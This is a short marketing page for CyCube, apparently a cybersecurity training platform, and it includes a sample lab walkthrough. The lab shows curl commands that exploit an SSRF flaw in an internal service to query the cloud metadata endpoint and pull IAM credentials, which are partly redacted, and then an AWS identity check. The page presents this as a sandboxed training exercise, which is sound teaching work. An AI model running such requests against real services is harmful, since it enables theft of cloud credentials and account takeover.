CyCube is a capability platform — browser labs, a live-fire range, skill diagnostics, and a researcher network behind one console. Not course completion. Proof.
One pane, every cohort. Every panel rolls up to a number a CISO can take to the board.
Each lab is a sandboxed environment with a real intrusion path. This one walks an SSRF in an internal service all the way to a cloud-metadata credential lift.
$ curl http://internal-svc/fetch?url=http://example.com
{"ok": true, "body": "<html>..."}
$ curl http://internal-svc/fetch?url=http://169.254.169.254/latest/meta-data/
iam/
hostname
public-ipv4
...
$ curl http://internal-svc/fetch?url=http://169.254.169.254/latest/meta-data/iam/security-credentials/lab-role
{
"AccessKeyId": "AKIA****REDACTED",
"SecretAccessKey": "****REDACTED",
"Token": "FwoGZX...",
"Expiration": "2026-04-25T18:42:11Z"
}
$ aws sts get-caller-identityPick one module. We provision a tenant, baseline the cohort, run the first drill, and hand back a measured skill delta. Decide on the rest after.